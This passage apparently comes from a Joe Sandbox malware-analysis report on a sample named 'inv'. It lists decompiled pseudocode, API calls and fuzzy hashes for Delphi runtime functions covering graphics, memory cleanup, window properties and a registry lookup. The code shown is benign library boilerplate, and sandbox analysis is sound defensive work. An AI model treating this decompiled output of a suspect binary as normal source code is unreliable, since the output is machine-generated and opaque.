                                  				return DeleteDC(_v16);
                                  			}












                                  APIs
                                    • Part of subcall function 0041DE8C: GetObjectA.GDI32(?,00000054), ref: 0041DEA0
                                  • 72E7A590.GDI32(00000000), ref: 0041DFFE
                                  • 72E7B410.GDI32(?,?,00000000,00000000,0041E079,?,00000000), ref: 0041E01F
                                  • 72E7B150.GDI32(?,?,?,00000000,00000000,0041E079,?,00000000), ref: 0041E02B
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041E042
                                  • 72E7B410.GDI32(?,00000000,00000000,0041E080,?,00000000), ref: 0041E06A
                                  • DeleteDC.GDI32(?), ref: 0041E073
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B410$A590B150BitsDeleteObject
                                  • String ID:
                                  • API String ID: 3837315262-0
                                  • Opcode ID: 67be1ba285c8e5dade2e7c63aed3f2ab1ab61efcee9f337c8fe9cbee30d784cf
                                  • Instruction ID: 589b6356614231939e9929ce6f3670b692a7e43d8ad09533892c8f7fab249a6c
                                  • Opcode Fuzzy Hash: 67be1ba285c8e5dade2e7c63aed3f2ab1ab61efcee9f337c8fe9cbee30d784cf
                                  • Instruction Fuzzy Hash: 72116A75A44204BFDB10DBAA8C81F9EBBECAB4D700F51846AF914E7281D67899408B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00401AC0() {
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t14;
                                  				intOrPtr* _t19;
                                  				intOrPtr _t23;
                                  				intOrPtr _t26;
                                  				intOrPtr _t28;
                                  
                                  				_t26 = _t28;
                                  				if( *0x44f5c0 == 0) {
                                  					return _t2;
                                  				} else {
                                  					_push(_t26);
                                  					_push(E00401B96);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t28;
                                  					if( *0x44f049 != 0) {
                                  						_push(0x44f5c8);
                                  						L00401358();
                                  					}
                                  					 *0x44f5c0 = 0;
                                  					_t3 =  *0x44f620; // 0x70cac0
                                  					LocalFree(_t3);
                                  					 *0x44f620 = 0;
                                  					_t19 =  *0x44f5e8; // 0x70aa0c
                                  					while(_t19 != 0x44f5e8) {
                                  						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                  						_t19 =  *_t19;
                                  					}
                                  					E004013C0(0x44f5e8);
                                  					E004013C0(0x44f5f8);
                                  					E004013C0(0x44f624);
                                  					_t14 =  *0x44f5e0; // 0x70a3d8
                                  					while(_t14 != 0) {
                                  						 *0x44f5e0 =  *_t14;
                                  						LocalFree(_t14);
                                  						_t14 =  *0x44f5e0; // 0x70a3d8
                                  					}
                                  					_pop(_t23);
                                  					 *[fs:eax] = _t23;
                                  					_push(0x401b9d);
                                  					if( *0x44f049 != 0) {
                                  						_push(0x44f5c8);
                                  						L00401360();
                                  					}
                                  					_push(0x44f5c8);
                                  					L00401368();
                                  					return 0;
                                  				}
                                  			}











                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(0044F5C8,00000000,00401B96), ref: 00401AED
                                  • LocalFree.KERNEL32(0070CAC0,00000000,00401B96), ref: 00401AFF
                                  • VirtualFree.KERNEL32(?,00000000,00008000,0070CAC0,00000000,00401B96), ref: 00401B1E
                                  • LocalFree.KERNEL32(0070A3D8,?,00000000,00008000,0070CAC0,00000000,00401B96), ref: 00401B5D
                                  • RtlLeaveCriticalSection.KERNEL32(0044F5C8,00401B9D,0070CAC0,00000000,00401B96), ref: 00401B86
                                  • RtlDeleteCriticalSection.KERNEL32(0044F5C8,00401B9D,0070CAC0,00000000,00401B96), ref: 00401B90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID:
                                  • API String ID: 3782394904-0
                                  • Opcode ID: 3115ad5b4270529c973cc775a0591dd661959e0b6084ed7422f44008e6f5438a
                                  • Instruction ID: 72d7ea340d0b3782bb1bf70e87258d6ae8a1272d8b6a1244c1bfe72803cdf6a3
                                  • Opcode Fuzzy Hash: 3115ad5b4270529c973cc775a0591dd661959e0b6084ed7422f44008e6f5438a
                                  • Instruction Fuzzy Hash: E4115E787047806AF715AFA59842B1A37E4A746744F94407BF401A6AF3E77CA848C72C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00428CE4(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				char _v8;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t27;
                                  				void* _t31;
                                  				void* _t35;
                                  				intOrPtr* _t43;
                                  
                                  				_t43 =  &_v8;
                                  				_t20 =  *0x44d9d4; // 0x0
                                  				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                  				_t21 =  *0x44d9d4; // 0x0
                                  				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                  					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                  				}
                                  				_t27 =  *0x44d9d4; // 0x0
                                  				SetPropA(_a4,  *0x44fb1e & 0x0000ffff, _t27);
                                  				_t31 =  *0x44d9d4; // 0x0
                                  				SetPropA(_a4,  *0x44fb1c & 0x0000ffff, _t31);
                                  				_t35 =  *0x44d9d4; // 0x0
                                  				 *0x44d9d4 = 0;
                                  				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                  				return  *_t43;
                                  			}











                                  APIs
                                  • SetWindowLongA.USER32 ref: 00428D0C
                                  • GetWindowLongA.USER32 ref: 00428D17
                                  • GetWindowLongA.USER32 ref: 00428D29
                                  • SetWindowLongA.USER32 ref: 00428D3C
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00428D53
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00428D6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: LongWindow$Prop
                                  • String ID:
                                  • API String ID: 3887896539-0
                                  • Opcode ID: a70c005da8cd157e396c2ab1f45763d91c44f5100c819d8d323fb196d377f141
                                  • Instruction ID: 75f526b112bcd136e0771fa485fc0ac8b9fbc6e6e52eb9ab7a6e56a464d3a3ea
                                  • Opcode Fuzzy Hash: a70c005da8cd157e396c2ab1f45763d91c44f5100c819d8d323fb196d377f141
                                  • Instruction Fuzzy Hash: F611EFB9501144BFCF00DF99ED84EEA37E8EB09354F104126B915DB2E1D738E9549B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0041D834(struct HDC__* __eax, signed int __ecx) {
                                  				char _v1036;
                                  				signed int _v1038;
                                  				struct tagRGBQUAD _v1048;
                                  				short _v1066;
                                  				short* _t15;
                                  				void* _t18;
                                  				struct HDC__* _t23;
                                  				void* _t26;
                                  				short* _t31;
                                  				short* _t32;
                                  
                                  				_t31 = 0;
                                  				 *_t32 = 0x300;
                                  				if(__eax == 0) {
                                  					_v1038 = __ecx;
                                  					E004028B8(_t26, __ecx << 2,  &_v1036);
                                  				} else {
                                  					_push(0);
                                  					L00405FC8();
                                  					_t23 = __eax;
                                  					_t18 = SelectObject(__eax, __eax);
                                  					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                  					SelectObject(_t23, _t18);
                                  					DeleteDC(_t23);
                                  				}
                                  				if(_v1038 != 0) {
                                  					if(_v1038 != 0x10 || E0041D79C(_t32) == 0) {
                                  						E0041D62C( &_v1036, _v1038 & 0x0000ffff);
                                  					}
                                  					_t15 = _t32;
                                  					_push(_t15);
                                  					L00405FF0();
                                  					_t31 = _t15;
                                  				}
                                  				return _t31;
                                  			}














                                  APIs
                                  • 72E7A590.GDI32(00000000,00000000,?,?,0041FD23,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041D84D
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041D856
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0041FD23,?,?,?,?,0041E90F), ref: 0041D86A
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041D876
                                  • DeleteDC.GDI32(00000000), ref: 0041D87C
                                  • 72E7A8F0.GDI32(?,00000000,?,?,0041FD23,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041D8C2
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$A590ColorDeleteTable
                                  • String ID:
                                  • API String ID: 1056449717-0
                                  • Opcode ID: c922995451abb137bcc4a117749e1c38feb9d58c54b13aabf514f4f0dd1ac872
                                  • Instruction ID: af82ca1c2ff5d2e774fc0e88403b9d5a42cfa73c8bf066b53a78733b1c40521a
                                  • Opcode Fuzzy Hash: c922995451abb137bcc4a117749e1c38feb9d58c54b13aabf514f4f0dd1ac872
                                  • Instruction Fuzzy Hash: FE01B9B190431062E624B76A9C47B9B72FC9FC0758F01C92FB585A72C2E57CCC88835E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041CF24(void* __eax) {
                                  				void* _t36;
                                  
                                  				_t36 = __eax;
                                  				UnrealizeObject(E0041C700( *((intOrPtr*)(__eax + 0x14))));
                                  				SelectObject( *(_t36 + 4), E0041C700( *((intOrPtr*)(_t36 + 0x14))));
                                  				if(E0041C7E0( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                  					SetBkColor( *(_t36 + 4),  !(E0041BA40(E0041C6C4( *((intOrPtr*)(_t36 + 0x14))))));
                                  					return SetBkMode( *(_t36 + 4), 1);
                                  				} else {
                                  					SetBkColor( *(_t36 + 4), E0041BA40(E0041C6C4( *((intOrPtr*)(_t36 + 0x14)))));
                                  					return SetBkMode( *(_t36 + 4), 2);
                                  				}
                                  			}





                                  APIs
                                    • Part of subcall function 0041C700: CreateBrushIndirect.GDI32(?), ref: 0041C7AA
                                  • UnrealizeObject.GDI32(00000000), ref: 0041CF30
                                  • SelectObject.GDI32(?,00000000), ref: 0041CF42
                                  • SetBkColor.GDI32(?,00000000), ref: 0041CF65
                                  • SetBkMode.GDI32(?,00000002), ref: 0041CF70
                                  • SetBkColor.GDI32(?,00000000), ref: 0041CF8B
                                  • SetBkMode.GDI32(?,00000001), ref: 0041CF96
                                    • Part of subcall function 0041BA40: GetSysColor.USER32(?), ref: 0041BA4A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
                                  • Opcode ID: 53ab403dc158ced5f445598ecf5fb444c902524bcbbde6f5e5d025a4b5dd3e29
                                  • Instruction ID: 8d122ef9bccf4ded3db906400f2e27ef29be24ced6a95f8d462c6412ee018f1c
                                  • Opcode Fuzzy Hash: 53ab403dc158ced5f445598ecf5fb444c902524bcbbde6f5e5d025a4b5dd3e29
                                  • Instruction Fuzzy Hash: 8FF0CD716801019BDE00FFAADDC6E5B67986F08309704806AB905DF197CA79E8605B39
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405A31(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                  				long _t11;
                                  				void* _t16;
                                  
                                  				_t16 = __ebx;
                                  				 *__edi =  *__edi + __ecx;
                                  				 *((intOrPtr*)(__eax - 0x44f5b8)) =  *((intOrPtr*)(__eax - 0x44f5b8)) + __eax - 0x44f5b8;
                                  				 *0x44d008 = 2;
                                  				 *0x44f014 = 0x4011fc;
                                  				 *0x44f018 = 0x401204;
                                  				 *0x44f04a = 2;
                                  				 *0x44f000 = E00404BAC;
                                  				if(E00402F20() != 0) {
                                  					_t3 = E00402F50();
                                  				}
                                  				E00403014(_t3);
                                  				 *0x44f050 = 0xd7b0;
                                  				 *0x44f21c = 0xd7b0;
                                  				 *0x44f3e8 = 0xd7b0;
                                  				 *0x44f03c = GetCommandLineA();
                                  				 *0x44f038 = E0040130C();
                                  				if((GetVersion() & 0x80000000) == 0x80000000) {
                                  					 *0x44f5bc = E00405968(GetThreadLocale(), _t16, __eflags);
                                  				} else {
                                  					if((GetVersion() & 0x000000ff) <= 4) {
                                  						 *0x44f5bc = E00405968(GetThreadLocale(), _t16, __eflags);
                                  					} else {
                                  						 *0x44f5bc = 3;
                                  					}
                                  				}
                                  				_t11 = GetCurrentThreadId();
                                  				 *0x44f030 = _t11;
                                  				return _t11;
                                  			}





                                  APIs
                                    • Part of subcall function 00402F20: GetKeyboardType.USER32(00000000), ref: 00402F25
                                    • Part of subcall function 00402F20: GetKeyboardType.USER32(00000001), ref: 00402F31
                                  • GetCommandLineA.KERNEL32 ref: 00405A97
                                  • GetVersion.KERNEL32 ref: 00405AAB
                                  • GetVersion.KERNEL32 ref: 00405ABC
                                  • GetCurrentThreadId.KERNEL32 ref: 00405AF8
                                    • Part of subcall function 00402F50: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F72
                                    • Part of subcall function 00402F50: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FA5
                                    • Part of subcall function 00402F50: RegCloseKey.ADVAPI32(?,00402FC8,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FBB
                                  • GetThreadLocale.KERNEL32 ref: 00405AD8
                                    • Part of subcall function 00405968: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004059CE), ref: 0040598E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID:
                                  • API String ID: 3734044017-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AE20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v273;
                                  				char _v534;
                                  				char _v790;
                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                  				char _v824;
                                  				intOrPtr _v828;
                                  				char _v832;
                                  				intOrPtr _v836;
                                  				char _v840;
                                  				intOrPtr _v844;
                                  				char _v848;
                                  				char* _v852;
                                  				char _v856;
                                  				char _v860;
                                  				char _v1116;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t40;
                                  				intOrPtr _t51;
                                  				struct HINSTANCE__* _t53;
                                  				void* _t69;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  				intOrPtr _t83;
                                  				intOrPtr _t86;
                                  				intOrPtr* _t87;
                                  				void* _t93;
                                  
                                  				_t93 = __fp0;
                                  				_v8 = __ecx;
                                  				_t73 = __edx;
                                  				_t87 = __eax;
                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                  					_t40 =  *0x44f664; // 0x400000
                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                  					_v12 = E0040AE14(_t73);
                                  				} else {
                                  					_v12 = _t73 - _v820.AllocationBase;
                                  				}
                                  				E0040818C( &_v273, 0x104, E0040BDAC(0x5c) + 1);
                                  				_t74 = 0x40afa0;
                                  				_t86 = 0x40afa0;
                                  				_t83 =  *0x406bf8; // 0x406c44
                                  				if(E00403264(_t87, _t83) != 0) {
                                  					_t74 = E004042D0( *((intOrPtr*)(_t87 + 4)));
                                  					_t69 = E00408128(_t74, 0x40afa0);
                                  					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                  						_t86 = 0x40afa4;
                                  					}
                                  				}
                                  				_t51 =  *0x44e0dc; // 0x4069a8
                                  				_t16 = _t51 + 4; // 0xffe8
                                  				_t53 =  *0x44f664; // 0x400000
                                  				LoadStringA(E00404E7C(_t53),  *_t16,  &_v790, 0x100);
                                  				E00403028( *_t87,  &_v1116);
                                  				_v860 =  &_v1116;
                                  				_v856 = 4;
                                  				_v852 =  &_v273;
                                  				_v848 = 6;
                                  				_v844 = _v12;
                                  				_v840 = 5;
                                  				_v836 = _t74;
                                  				_v832 = 6;
                                  				_v828 = _t86;
                                  				_v824 = 6;
                                  				E004087B0(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                  				return E00408128(_v8, _t86);
                                  			}































                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AE3D
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AE61
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AE7C
                                  • LoadStringA.USER32 ref: 0040AF12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: Dl@
                                  • API String ID: 3990497365-927373621
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AE1E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v273;
                                  				char _v534;
                                  				char _v790;
                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                  				char _v824;
                                  				intOrPtr _v828;
                                  				char _v832;
                                  				intOrPtr _v836;
                                  				char _v840;
                                  				intOrPtr _v844;
                                  				char _v848;
                                  				char* _v852;
                                  				char _v856;
                                  				char _v860;
                                  				char _v1116;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t40;
                                  				intOrPtr _t51;
                                  				struct HINSTANCE__* _t53;
                                  				void* _t69;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  				intOrPtr _t85;
                                  				intOrPtr _t89;
                                  				intOrPtr* _t92;
                                  				void* _t105;
                                  
                                  				_v8 = __ecx;
                                  				_t74 = __edx;
                                  				_t92 = __eax;
                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                  					_t40 =  *0x44f664; // 0x400000
                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                  					_v12 = E0040AE14(_t74);
                                  				} else {
                                  					_v12 = _t74 - _v820.AllocationBase;
                                  				}
                                  				E0040818C( &_v273, 0x104, E0040BDAC(0x5c) + 1);
                                  				_t75 = 0x40afa0;
                                  				_t89 = 0x40afa0;
                                  				_t85 =  *0x406bf8; // 0x406c44
                                  				if(E00403264(_t92, _t85) != 0) {
                                  					_t75 = E004042D0( *((intOrPtr*)(_t92 + 4)));
                                  					_t69 = E00408128(_t75, 0x40afa0);
                                  					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                  						_t89 = 0x40afa4;
                                  					}
                                  				}
                                  				_t51 =  *0x44e0dc; // 0x4069a8
                                  				_t16 = _t51 + 4; // 0xffe8
                                  				_t53 =  *0x44f664; // 0x400000
                                  				LoadStringA(E00404E7C(_t53),  *_t16,  &_v790, 0x100);
                                  				E00403028( *_t92,  &_v1116);
                                  				_v860 =  &_v1116;
                                  				_v856 = 4;
                                  				_v852 =  &_v273;
                                  				_v848 = 6;
                                  				_v844 = _v12;
                                  				_v840 = 5;
                                  				_v836 = _t75;
                                  				_v832 = 6;
                                  				_v828 = _t89;
                                  				_v824 = 6;
                                  				E004087B0(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                  				return E00408128(_v8, _t89);
                                  			}































                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AE3D
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AE61
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AE7C
                                  • LoadStringA.USER32 ref: 0040AF12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: Dl@
                                  • API String ID: 3990497365-927373621
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00402F50() {
                                  				void* _v8;
                                  				char _v12;
                                  				int _v16;
                                  				signed short _t12;
                                  				signed short _t14;
                                  				intOrPtr _t27;
                                  				void* _t29;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  
                                  				_t29 = _t31;
                                  				_t32 = _t31 + 0xfffffff4;
                                  				_v12 =  *0x44d020 & 0x0000ffff;
                                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                  					_t12 =  *0x44d020; // 0x1372
                                  					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                  					 *0x44d020 = _t14;
                                  					return _t14;
                                  				} else {
                                  					_push(_t29);
                                  					_push(E00402FC1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t32;
                                  					_v16 = 4;
                                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                  					_pop(_t27);
                                  					 *[fs:eax] = _t27;
                                  					_push(0x402fc8);
                                  					return RegCloseKey(_v8);
                                  				}
                                  			}












                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F72
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FA5
                                  • RegCloseKey.ADVAPI32(?,00402FC8,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FBB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00444050(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				signed char _t92;
                                  				int _t98;
                                  				int _t100;
                                  				intOrPtr _t117;
                                  				int _t122;
                                  				intOrPtr _t155;
                                  				void* _t164;
                                  				signed char _t180;
                                  				intOrPtr _t182;
                                  				intOrPtr _t194;
                                  				int _t199;
                                  				intOrPtr _t203;
                                  				void* _t204;
                                  
                                  				_t204 = __eflags;
                                  				_t202 = _t203;
                                  				_v8 = __eax;
                                  				E0042EEA8(_v8);
                                  				_push(_t203);
                                  				_push(0x4442a6);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t203;
                                  				 *(_v8 + 0x268) = 0;
                                  				 *(_v8 + 0x26c) = 0;
                                  				 *(_v8 + 0x270) = 0;
                                  				_t164 = 0;
                                  				_t92 =  *0x44f661; // 0x0
                                  				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                  				E0042E604(_v8, 0, __edx, _t204);
                                  				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                  					L12:
                                  					_t98 =  *(_v8 + 0x268);
                                  					_t213 = _t98;
                                  					if(_t98 > 0) {
                                  						E0042B90C(_v8, _t98, _t213);
                                  					}
                                  					_t100 =  *(_v8 + 0x26c);
                                  					_t214 = _t100;
                                  					if(_t100 > 0) {
                                  						E0042B950(_v8, _t100, _t214);
                                  					}
                                  					_t180 =  *0x4442b4; // 0x0
                                  					 *(_v8 + 0x98) = _t180;
                                  					_t215 = _t164;
                                  					if(_t164 == 0) {
                                  						E004436B0(_v8, 1, 1);
                                  						E00432068(_v8, 1, 1, _t215);
                                  					}
                                  					E0042D05C(_v8, 0, 0xb03d, 0);
                                  					_pop(_t182);
                                  					 *[fs:eax] = _t182;
                                  					_push(0x4442ad);
                                  					return E0042EEB0(_v8);
                                  				} else {
